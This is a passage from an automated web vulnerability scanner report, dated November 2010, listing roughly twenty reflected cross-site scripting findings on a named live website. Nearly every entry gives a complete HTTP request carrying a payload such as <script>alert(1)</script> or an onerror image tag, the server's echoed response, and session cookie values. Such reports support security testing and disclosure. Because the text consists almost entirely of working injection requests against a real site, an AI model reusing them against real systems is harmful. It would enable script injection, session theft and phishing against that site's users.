The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 649d1<script>alert(1)</script>9bd5009eb19f636a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication649d1<script>alert(1)</script>9bd5009eb19f636a9/mobile-content/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication649d1<script>alert(1)</script>9bd5009eb19f636a9/mobile-content/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.582. http://www.resellerbase.com/communication/mobile-content/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e82c5<script>alert(1)</script>b2fbdfe74625eb331 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication/mobile-contente82c5<script>alert(1)</script>b2fbdfe74625eb331/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contente82c5<script>alert(1)</script>b2fbdfe74625eb331/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.583. http://www.resellerbase.com/communication/mobile-content/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d3b5a<script>alert(1)</script>ac7b482ac07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentd3b5a<script>alert(1)</script>ac7b482ac07/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentd3b5a<script>alert(1)</script>ac7b482ac07/ was not found on this server.</p>
...[SNIP]...

2.584. http://www.resellerbase.com/communication/mobile-content/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e2940<script>alert(1)</script>e390d38b526 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/?e2940<script>alert(1)</script>e390d38b526=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/?e2940<script>alert(1)</script>e390d38b526=1 was not found on this server.</p>
...[SNIP]...

2.585. http://www.resellerbase.com/communication/mobile-content/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload be9c5<a>62550c607ee was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fbe9c5<a>62550c607ee HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fbe9c5<a>62550c607ee was not found on this server.</p>
...[SNIP]...

2.586. http://www.resellerbase.com/communication/mobile-content/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6dd7<script>alert(1)</script>3e3bacf83cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationf6dd7<script>alert(1)</script>3e3bacf83cc/mobile-content/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationf6dd7<script>alert(1)</script>3e3bacf83cc/mobile-content/googlepr.php was not found on this server.</p>
...[SNIP]...

2.587. http://www.resellerbase.com/communication/mobile-content/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1d31<script>alert(1)</script>92fae86db29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentc1d31<script>alert(1)</script>92fae86db29/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentc1d31<script>alert(1)</script>92fae86db29/googlepr.php was not found on this server.</p>
...[SNIP]...

2.588. http://www.resellerbase.com/communication/mobile-content/googlepr.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4ac3a<script>alert(1)</script>7414cf9482a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/googlepr.php4ac3a<script>alert(1)</script>7414cf9482a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/googlepr.php4ac3a<script>alert(1)</script>7414cf9482a was not found on this server.</p>
...[SNIP]...

2.589. http://www.resellerbase.com/communication/mobile-content/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 48178<a>8f1636048da was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/googlepr.php?link_id=2948178<a>8f1636048da HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/googlepr.php?link_id=2948178<a>8f1636048da was not found on this server.</p>
...[SNIP]...

2.590. http://www.resellerbase.com/communication/mobile-content/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8f1b2<script>alert(1)</script>64ca82a084c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/googlepr.php?8f1b2<script>alert(1)</script>64ca82a084c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/googlepr.php?8f1b2<script>alert(1)</script>64ca82a084c=1 was not found on this server.</p>
...[SNIP]...

2.591. http://www.resellerbase.com/communication/mobile-content/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22d9b<script>alert(1)</script>090344d2f91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication22d9b<script>alert(1)</script>090344d2f91/mobile-content/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication22d9b<script>alert(1)</script>090344d2f91/mobile-content/search.php was not found on this server.</p>
...[SNIP]...

2.592. http://www.resellerbase.com/communication/mobile-content/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2ec5<script>alert(1)</script>a5e7adbcd18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentb2ec5<script>alert(1)</script>a5e7adbcd18/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentb2ec5<script>alert(1)</script>a5e7adbcd18/search.php was not found on this server.</p>
...[SNIP]...

2.593. http://www.resellerbase.com/communication/mobile-content/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e3698<script>alert(1)</script>654ff0c5a43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/search.phpe3698<script>alert(1)</script>654ff0c5a43 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/search.phpe3698<script>alert(1)</script>654ff0c5a43 was not found on this server.</p>
...[SNIP]...

2.594. http://www.resellerbase.com/communication/mobile-content/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f9804<a>3af83332e1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/search.php?keyword=search...&Submit3=Searchf9804<a>3af83332e1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/search.php?keyword=search...&Submit3=Searchf9804<a>3af83332e1&opt=2 was not found on this server.</p>
...[SNIP]...

2.595. http://www.resellerbase.com/communication/mobile-content/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da23b"><img%20src%3da%20onerror%3dalert(1)>30772013b4d was submitted in the cat parameter. This input was echoed as da23b\"><img src=a onerror=alert(1)>30772013b4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /communication/mobile-content/search.php?cat=16da23b"><img%20src%3da%20onerror%3dalert(1)>30772013b4d&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:37:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 21103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=16da23b\"><img src=a onerror=alert(1)>30772013b4d">
...[SNIP]...

2.596. http://www.resellerbase.com/communication/mobile-content/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ba5"><img%20src%3da%20onerror%3dalert(1)>837cf663a15c11d44 was submitted in the cat parameter. This input was echoed as b0ba5\"><img src=a onerror=alert(1)>837cf663a15c11d44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication/mobile-content/search.php?cat=16b0ba5"><img%20src%3da%20onerror%3dalert(1)>837cf663a15c11d44&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/search.php?cat=16&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:38:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 21139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=16b0ba5\"><img src=a onerror=alert(1)>837cf663a15c11d44">
...[SNIP]...

2.597. http://www.resellerbase.com/communication/mobile-content/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 28df8<a>3144d6cb9f7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/search.php?keyword=search...28df8<a>3144d6cb9f7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/search.php?keyword=search...28df8<a>3144d6cb9f7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.598. http://www.resellerbase.com/communication/mobile-content/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f70c4<script>alert(1)</script>7c258a504a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/search.php?f70c4<script>alert(1)</script>7c258a504a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/search.php?f70c4<script>alert(1)</script>7c258a504a7=1 was not found on this server.</p>
...[SNIP]...

2.599. http://www.resellerbase.com/communication/mobile-content/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/mobile-content/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload af9ff<a>58bf6ba94b6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/search.php?keyword=search...&Submit3=Search&opt=2af9ff<a>58bf6ba94b6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:39 GMT
Server: Apache/2
